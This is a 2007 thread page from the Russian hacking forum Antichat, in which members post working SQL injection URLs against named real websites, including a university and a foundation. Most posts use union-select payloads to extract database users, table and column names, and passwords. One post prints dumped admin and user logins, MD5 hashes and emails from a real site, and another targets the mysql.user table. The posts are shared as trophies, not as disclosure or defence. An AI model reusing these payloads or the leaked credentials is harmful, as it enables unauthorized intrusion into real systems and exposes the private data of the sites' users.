ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2691  
Старый 12.07.2007, 18:48
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

www.wanna-be.tv
9 юзеров
Код:
http://www.wanna-be.tv/items.php?item=99999999+union+select+1,id,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,password,38+from+users+limit+0,1/*
 
Ответить с цитированием

  #2692  
Старый 12.07.2007, 19:17
Аватар для V1p-eR
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

www.active-video.net
Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12/*
sitemaster@localhost:5.0.22:zerinru_cms

Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),table_name),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+column_name=0x6c6f67696e+limit+0,1/*
вытаскиваем таблицу с юзерами:zerinru_cms:users_mk

Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name='users_mk'+limit+0,1/*
узнаем имена колонок:ID,Login,Password,Email,Status

Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,login,password,ID,Email),4,5,6,7,8,9,10,11,12+from+users_mk/*
=))
admin:8dc6eab8d5b075c7523797412cba4564:1:asd@asd.a sd
news:bd27bd83e6598a329eaee5c62a876726:2:asd@asd.as d
user:e7c3218ac64594c02bc5c793f5c6b99a:3:none

Последний раз редактировалось V1p-eR; 12.07.2007 в 19:31..
 
Ответить с цитированием

  #2693  
Старый 12.07.2007, 23:19
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5,6,7,8,9%20from%20designer/*
джэс тур
Код:
http://www.bali-welcome.ru/hotel6.php?id=430%20union%20select%201,2,3,4,5,concat(user(),char(58),database()),7/*

Последний раз редактировалось kair; 13.07.2007 в 00:35..
 
Ответить с цитированием

  #2694  
Старый 13.07.2007, 04:18
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию

Уруру - http://www.webfile.ru/files.php?search=gemaglabin')+and+1=0+union+select +1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+From+IN FORMATION_SCHEMA.TABLES+LIMIT+1,1/*
 
Ответить с цитированием

  #2695  
Старый 13.07.2007, 10:17
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Гема ужасно набоянил =)
///
Цитата:
http://www.fondationbrigittebardot.fr/site/fondation.php?Id=-6+union+select+1,aes_decrypt(aes_encrypt(version() ,0x99),0x99),3,4,5,6

Последний раз редактировалось Spyder; 13.07.2007 в 10:31..
 
Ответить с цитированием

  #2696  
Старый 13.07.2007, 16:29
Аватар для Geser
Geser
Новичок
Регистрация: 13.07.2007
Сообщений: 3
Провел на форуме:
13209

Репутация: 0
По умолчанию

Вопрос от новичка:
тестирую www.ukazatel.ru/search.php
инъекцию допускает, но ничего путного извлечь не мог, результаты запроса не сразу выводятся, а идут дальше в другой запрос. Это что значит, что инъекция тут невозможнп?
 
Ответить с цитированием

  #2697  
Старый 13.07.2007, 17:11
Аватар для hitex
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Иркутский филиал СТК. 36 таблиц с паролями x_X

Код:
http://www.esir.ru/ru/contact/forum/s/p/?checkforums=1&checksubject=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,user(),version(),database()),count(concat_ws(0x203a20,table_schema,table_name,column_name)),8,9,10,11,12,13,14,15+from+information_schema.columns+where+column_name="passwd"+or+column_name="password"+or+column_name="pass"
Для красивого вывода можно было бы раскрутить _http://www.esir.ru/ru/contact/forum/s/?checkforums=-1+or+1=2 но чего-то не получилось =\
 
Ответить с цитированием

  #2698  
Старый 13.07.2007, 23:29
Аватар для iv.
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

Цитата:
http://www.master-office.ru/index.php?l=2&pid=-1%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7/*
Четверка. Вывести ничего не получилось :(
 
Ответить с цитированием

  #2699  
Старый 14.07.2007, 19:15
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://www.ciu.edu/seminary/faculty/contact.php?id=-1+union+select+1,2,3,concat(0x22202F3E3C62723E3C62 723E3C63656E7465723E3C623E,VERSION(),0x3a,DATABASE (),0x3a,USER(),0x3C2F623E3C2F63656E7465723E3C212D2 D)
Во как Четвёртая, перебирать лень
 
Ответить с цитированием

  #2700  
Старый 14.07.2007, 19:21
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x5B3A5 D,user,password),11,12,13,14,15,16,17,18,19,20,21, 22,23,24+from+mysql.user
Хы... Первый раз вижу что бы всё было так запущено =\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ